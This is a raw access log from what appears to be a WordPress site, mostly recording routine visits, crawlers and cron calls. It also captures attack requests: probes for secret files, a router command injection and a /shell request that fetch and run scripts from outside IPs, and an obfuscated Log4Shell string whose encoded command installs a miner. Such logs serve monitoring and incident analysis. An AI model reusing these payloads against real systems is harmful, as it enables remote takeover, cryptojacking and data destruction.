43.130.139.177 - - [11/Aug/2025:03:45:21 +0800] "GET /portfolio-category/remaining-rolls/ HTTP/1.1" 200 17763 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.166.244.251 - - [11/Aug/2025:03:57:50 +0800] "GET //Material.html HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.166.244.251 - - [11/Aug/2025:03:57:56 +0800] "GET /Material.html HTTP/1.1" 404 9423 "http://cqqizhou.com//Material.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
185.242.226.82 - - [11/Aug/2025:03:58:07 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
185.242.226.82 - - [11/Aug/2025:03:58:14 +0800] "GET / HTTP/1.1" 200 33397 "http://36.133.115.36:80/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
36.133.115.36 - - [11/Aug/2025:04:23:07 +0800] "POST /wp-cron.php?doing_wp_cron=1754857387.5412330627441406250000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
121.4.97.180 - - [11/Aug/2025:04:23:07 +0800] "GET / HTTP/1.1" 200 33398 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
83.217.72.249 - - [11/Aug/2025:04:30:43 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
196.251.86.50 - - [11/Aug/2025:04:36:39 +0800] "GET / HTTP/1.0" 200 109870 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0"
36.133.115.36 - - [11/Aug/2025:05:05:55 +0800] "POST /wp-cron.php?doing_wp_cron=1754859955.6925299167633056640625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
193.34.212.110 - - [11/Aug/2025:05:05:56 +0800] "GET / HTTP/1.1" 200 33396 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
93.174.93.12 - - [11/Aug/2025:05:21:19 +0800] "GET / HTTP/1.0" 301 0 "-" "Mozilla/5.0 (Linux; U; Android 1.5; de-ch; HTC Hero Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1"
176.65.148.225 - - [11/Aug/2025:05:27:38 +0800] "GET / HTTP/1.0" 200 109870 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0"
36.133.115.36 - - [11/Aug/2025:05:42:58 +0800] "POST /wp-cron.php?doing_wp_cron=1754862178.2912909984588623046875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
209.38.133.104 - - [11/Aug/2025:05:42:58 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
209.38.133.104 - - [11/Aug/2025:05:42:59 +0800] "GET / HTTP/1.1" 200 33397 "http://36.133.115.36/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
209.38.133.104 - - [11/Aug/2025:05:43:00 +0800] "GET /form.html HTTP/1.1" 404 9422 "-" "curl/8.1.2"
209.38.133.104 - - [11/Aug/2025:05:43:01 +0800] "GET /upl.php HTTP/1.1" 404 47 "-" "Mozilla/5.0"
209.38.133.104 - - [11/Aug/2025:05:43:02 +0800] "GET /t4 HTTP/1.1" 404 9422 "-" "Mozilla/5.0"
209.38.133.104 - - [11/Aug/2025:05:43:03 +0800] "GET /geoip/ HTTP/1.1" 404 9422 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
209.38.133.104 - - [11/Aug/2025:05:43:03 +0800] "GET /1.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
209.38.133.104 - - [11/Aug/2025:05:43:04 +0800] "GET /systembc/password.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
209.38.133.104 - - [11/Aug/2025:05:43:04 +0800] "GET /password.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
114.224.191.184 - - [11/Aug/2025:05:45:58 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
112.22.130.44 - - [11/Aug/2025:05:45:59 +0800] "GET / HTTP/1.1" 200 152149 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
121.237.36.29 - - [11/Aug/2025:05:50:25 +0800] "GET / HTTP/1.1" 301 5 "-" "Dalvik/2.1.0 (Linux; U; Android 9.0; ZTE BA520 Build/MRA58K)"
121.237.36.29 - - [11/Aug/2025:05:50:26 +0800] "GET / HTTP/1.1" 200 33396 "-" "Dalvik/2.1.0 (Linux; U; Android 9.0; ZTE BA520 Build/MRA58K)"
121.237.36.27 - - [11/Aug/2025:05:50:45 +0800] "GET / HTTP/1.1" 301 5 "-" "Dalvik/2.1.0 (Linux; U; Android 9.0; ZTE BA520 Build/MRA58K)"
121.237.36.27 - - [11/Aug/2025:05:50:46 +0800] "GET / HTTP/1.1" 200 33396 "-" "Dalvik/2.1.0 (Linux; U; Android 9.0; ZTE BA520 Build/MRA58K)"
183.134.59.131 - - [11/Aug/2025:05:50:57 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Linux; Android 7.1.2; vivo X9i Build/N2G47H; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132 MQQBrowser/6.2 TBS/044207 Mobile Safari/537.36 MicroMessenger/6.7.2.1340(0x2607023A) NetType/4G Language/zh_CN"
121.237.36.29 - - [11/Aug/2025:05:51:22 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; hr) AppleWebKit/522.11.3 (KHTML, like Gecko) Version/3.0 Safari/522.11.3"
121.237.36.28 - - [11/Aug/2025:05:52:11 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.27 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/601.1.27"
121.237.36.28 - - [11/Aug/2025:05:52:12 +0800] "GET / HTTP/1.1" 200 33397 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.27 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/601.1.27"
183.134.59.131 - - [11/Aug/2025:05:59:52 +0800] "GET /?teir HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Linux; Android 7.1.2; vivo X9i Build/N2G47H; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132 MQQBrowser/6.2 TBS/044207 Mobile Safari/537.36 MicroMessenger/6.7.2.1340(0x2607023A) NetType/4G Language/zh_CN"
183.134.59.131 - - [11/Aug/2025:05:59:52 +0800] "GET /index/index/info?type=ultimate HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Linux; Android 7.1.2; vivo X9i Build/N2G47H; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132 MQQBrowser/6.2 TBS/044207 Mobile Safari/537.36 MicroMessenger/6.7.2.1340(0x2607023A) NetType/4G Language/zh_CN"
183.134.59.131 - - [11/Aug/2025:05:59:52 +0800] "GET /jw HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Linux; Android 7.1.2; vivo X9i Build/N2G47H; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132 MQQBrowser/6.2 TBS/044207 Mobile Safari/537.36 MicroMessenger/6.7.2.1340(0x2607023A) NetType/4G Language/zh_CN"
183.134.59.131 - - [11/Aug/2025:05:59:52 +0800] "GET /index/index/leaveMsg/s/4 HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Linux; Android 7.1.2; vivo X9i Build/N2G47H; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132 MQQBrowser/6.2 TBS/044207 Mobile Safari/537.36 MicroMessenger/6.7.2.1340(0x2607023A) NetType/4G Language/zh_CN"
183.134.59.131 - - [11/Aug/2025:05:59:53 +0800] "GET /?teir HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Linux; Android 7.1.2; vivo X9i Build/N2G47H; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132 MQQBrowser/6.2 TBS/044207 Mobile Safari/537.36 MicroMessenger/6.7.2.1340(0x2607023A) NetType/4G Language/zh_CN"
183.134.59.131 - - [11/Aug/2025:05:59:53 +0800] "GET /api/Event/Products/Average HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Linux; Android 7.1.2; vivo X9i Build/N2G47H; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132 MQQBrowser/6.2 TBS/044207 Mobile Safari/537.36 MicroMessenger/6.7.2.1340(0x2607023A) NetType/4G Language/zh_CN"
183.134.59.131 - - [11/Aug/2025:05:59:53 +0800] "GET /index/index/info?type=ultimate&date=1633382774669 HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Linux; Android 7.1.2; vivo X9i Build/N2G47H; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132 MQQBrowser/6.2 TBS/044207 Mobile Safari/537.36 MicroMessenger/6.7.2.1340(0x2607023A) NetType/4G Language/zh_CN"
183.134.59.131 - - [11/Aug/2025:05:59:53 +0800] "GET /index.php/user/login HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Linux; Android 7.1.2; vivo X9i Build/N2G47H; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132 MQQBrowser/6.2 TBS/044207 Mobile Safari/537.36 MicroMessenger/6.7.2.1340(0x2607023A) NetType/4G Language/zh_CN"
183.134.59.131 - - [11/Aug/2025:06:01:19 +0800] "GET / HTTP/1.1" 301 5 "-" "Dalvik/2.1.0 (Linux; U; Android 9.0; ZTE BA520 Build/MRA58K)"
183.134.59.131 - - [11/Aug/2025:06:01:20 +0800] "GET / HTTP/1.1" 200 33397 "-" "Dalvik/2.1.0 (Linux; U; Android 9.0; ZTE BA520 Build/MRA58K)"
36.133.108.121 - - [11/Aug/2025:06:03:43 +0800] "HEAD /login.asp HTTP/1.1" 404 0 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts)"
194.50.16.252 - - [11/Aug/2025:06:10:21 +0800] "GET /appsettings.json HTTP/1.1" 404 9422 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14) AppleWebKit/616.21 (KHTML, like Gecko) Version/17.0 Safari/616.21"
194.50.16.252 - - [11/Aug/2025:06:10:24 +0800] "GET /appsettings.Production.json HTTP/1.1" 404 9423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0"
36.133.108.119 - - [11/Aug/2025:06:12:43 +0800] "HEAD /cgi-bin/index.html HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.14 (KHTML, like Gecko) Chrome/24.0.1292.0 Safari/537.14"
5.223.50.215 - - [11/Aug/2025:06:35:43 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
149.50.96.5 - ffadmin [11/Aug/2025:06:45:14 +0800] "POST /bapply.cgi HTTP/1.1" 499 0 "http://36.133.115.36:80/apply.cgi" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36"
36.133.115.36 - - [11/Aug/2025:06:45:15 +0800] "POST /wp-cron.php?doing_wp_cron=1754865915.2798950672149658203125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.133.91.48 - - [11/Aug/2025:06:49:26 +0800] "GET / HTTP/1.1" 200 33397 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
116.179.32.26 - - [11/Aug/2025:06:51:41 +0800] "GET /wp-json/oembed/1.0/embed?url=http%3A%2F%2Fcqqizhou.com%2Fcontacts%2F HTTP/1.1" 200 1114 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
45.156.87.165 - - [11/Aug/2025:06:55:28 +0800] "POST /cgi-bin/ViewLog.asp HTTP/1.1" 499 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36"
43.157.148.38 - - [11/Aug/2025:06:56:58 +0800] "GET / HTTP/1.1" 200 33397 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.133.139.6 - - [11/Aug/2025:07:04:00 +0800] "GET /wp-content/uploads/2025/07/1753587901-Slider_3840 HTTP/1.1" 404 9422 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
170.64.177.244 - - [11/Aug/2025:07:08:09 +0800] "GET /.env HTTP/1.1" 404 9423 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
170.64.177.244 - - [11/Aug/2025:07:08:10 +0800] "GET /.git/config HTTP/1.1" 404 9422 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
124.156.226.179 - - [11/Aug/2025:07:14:07 +0800] "GET / HTTP/1.1" 200 33397 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.166.1.243 - - [11/Aug/2025:07:23:20 +0800] "GET / HTTP/1.1" 200 33397 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
149.50.96.5 - - [11/Aug/2025:07:23:45 +0800] "GET /cgi-bin/index.html HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36"
117.33.163.216 - - [11/Aug/2025:07:23:53 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
117.33.163.216 - - [11/Aug/2025:07:23:56 +0800] "GET / HTTP/1.1" 200 33397 "http://www.cqqizhou.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
45.156.87.165 - - [11/Aug/2025:07:25:45 +0800] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.ush.sh%7Csh%26&curpath=%2F¤tsetting.htm=1 HTTP/1.1" 499 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36"
170.106.72.178 - - [11/Aug/2025:07:33:12 +0800] "GET / HTTP/1.1" 200 33398 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
185.242.226.82 - - [11/Aug/2025:07:45:01 +0800] "GET / HTTP/1.1" 499 0 "-" "python-requests/2.26.0"
36.133.115.36 - - [11/Aug/2025:07:45:01 +0800] "POST /wp-cron.php?doing_wp_cron=1754869501.1757080554962158203125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.155.26.193 - - [11/Aug/2025:07:45:02 +0800] "GET / HTTP/1.1" 200 33396 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
149.50.96.5 - - [11/Aug/2025:07:58:20 +0800] "GET / HTTP/1.1" 200 33397 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36"
193.34.212.110 - - [11/Aug/2025:08:13:30 +0800] "GET / HTTP/1.1" 200 33398 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.108.121 - - [11/Aug/2025:08:14:45 +0800] "HEAD /dispatch.asp HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; es-es) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27"
111.14.236.21 - - [11/Aug/2025:08:17:52 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
111.14.236.21 - - [11/Aug/2025:08:17:53 +0800] "GET / HTTP/1.1" 200 33398 "-" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
197.57.72.226 - - [11/Aug/2025:08:49:29 +0800] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 213.209.150.159/jaws;sh+/tmp/jaws HTTP/1.1" 499 0 "-" "Hello, world"
36.133.115.36 - - [11/Aug/2025:08:49:29 +0800] "POST /wp-cron.php?doing_wp_cron=1754873369.7614569664001464843750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
193.34.212.110 - - [11/Aug/2025:09:16:28 +0800] "GET / HTTP/1.1" 200 33398 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
171.244.0.91 - - [11/Aug/2025:09:25:15 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
52.167.144.136 - - [11/Aug/2025:09:37:47 +0800] "GET /contacts/ HTTP/1.1" 200 18274 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
36.133.115.36 - - [11/Aug/2025:09:39:01 +0800] "POST /wp-cron.php?doing_wp_cron=1754876341.8447220325469970703125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
120.92.72.199 - - [11/Aug/2025:09:39:02 +0800] "GET / HTTP/1.1" 200 33398 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/21.0"
120.92.72.147 - - [11/Aug/2025:09:39:02 +0800] "GET /wp-admin/admin-ajax.php HTTP/1.1" 400 11 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/21.0"
120.92.72.72 - - [11/Aug/2025:09:39:03 +0800] "GET /wp-admin/admin-ajax.php HTTP/1.1" 400 11 "http://cqqizhou.com/wp-admin/admin-ajax.php" "Mozilla/5.0 (Linux; Android 4.1.1; Nexus 7 Build/JRO03D) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.166 Safari/535.19"
80.75.212.83 - - [11/Aug/2025:09:51:47 +0800] "GET /t%28%27$%7B$%7Benv:NaN:-j%7Dndi$%7Benv:NaN:-:%7D$%7Benv:NaN:-l%7Ddap$%7Benv:NaN:-:%7D//46.8.231.224:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwOi8vNDYuOC4yMzEuMjI0L3NjcmlwdHMvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1zOyB3Z2V0IC1xTy0gaHR0cDovLzQ2LjguMjMxLjIyNC9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==%7D%27%29 HTTP/1.1" 301 5 "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//46.8.231.224:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwOi8vNDYuOC4yMzEuMjI0L3NjcmlwdHMvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1zOyB3Z2V0IC1xTy0gaHR0cDovLzQ2LjguMjMxLjIyNC9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==}')" "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//46.8.231.224:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwOi8vNDYuOC4yMzEuMjI0L3NjcmlwdHMvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1zOyB3Z2V0IC1xTy0gaHR0cDovLzQ2LjguMjMxLjIyNC9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==}')"
80.75.212.83 - - [11/Aug/2025:09:51:48 +0800] "GET /t%28%27%7B%7Benv:NaN:-j%7Dndi%7Benv:NaN:-:%7D%7Benv:NaN:-l%7Ddap%7Benv:NaN:-:%7D/46.8.231.224:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwOi8vNDYuOC4yMzEuMjI0L3NjcmlwdHMvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1zOyB3Z2V0IC1xTy0gaHR0cDovLzQ2LjguMjMxLjIyNC9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw== HTTP/1.1" 404 32838 "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//46.8.231.224:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwOi8vNDYuOC4yMzEuMjI0L3NjcmlwdHMvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1zOyB3Z2V0IC1xTy0gaHR0cDovLzQ2LjguMjMxLjIyNC9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==}')" "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//46.8.231.224:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwOi8vNDYuOC4yMzEuMjI0L3NjcmlwdHMvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1zOyB3Z2V0IC1xTy0gaHR0cDovLzQ2LjguMjMxLjIyNC9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==}')"
149.50.96.5 - - [11/Aug/2025:10:01:12 +0800] "GET / HTTP/1.1" 200 33398 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36"
36.133.108.121 - - [11/Aug/2025:10:05:17 +0800] "HEAD /bapply.cgi HTTP/1.1" 404 0 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts)"
182.42.105.144 - - [11/Aug/2025:10:22:40 +0800] "GET / HTTP/1.1" 200 33399 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.135.183.82 - - [11/Aug/2025:10:34:07 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.135.183.82 - - [11/Aug/2025:10:34:09 +0800] "GET / HTTP/1.1" 200 33398 "http://36.133.115.36" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [11/Aug/2025:11:01:40 +0800] "POST /wp-cron.php?doing_wp_cron=1754881300.5339028835296630859375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
176.65.148.225 - - [11/Aug/2025:11:01:41 +0800] "GET / HTTP/1.0" 200 109870 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0"
149.100.11.243 - - [11/Aug/2025:11:09:28 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
149.100.11.243 - - [11/Aug/2025:11:09:30 +0800] "GET / HTTP/1.1" 200 33398 "http://36.133.115.36/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
206.168.34.120 - - [11/Aug/2025:11:14:50 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
206.168.34.120 - - [11/Aug/2025:11:15:31 +0800] "GET / HTTP/1.1" 200 33397 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
206.168.34.120 - - [11/Aug/2025:11:16:51 +0800] "GET /.well-known/security.txt HTTP/1.1" 404 9422 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
150.95.110.113 - - [11/Aug/2025:11:18:06 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
193.34.212.110 - - [11/Aug/2025:11:23:51 +0800] "GET / HTTP/1.1" 200 33397 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
52.167.144.198 - - [11/Aug/2025:11:27:57 +0800] "GET /services/ HTTP/1.1" 200 19866 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
36.133.115.36 - - [11/Aug/2025:11:43:19 +0800] "POST /wp-cron.php?doing_wp_cron=1754883799.8150689601898193359375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
111.229.111.163 - - [11/Aug/2025:11:43:20 +0800] "GET / HTTP/1.1" 200 33398 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36"
111.229.111.163 - - [11/Aug/2025:11:43:20 +0800] "GET /index.php?author=1 HTTP/1.1" 301 5 "http://cqqizhou.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
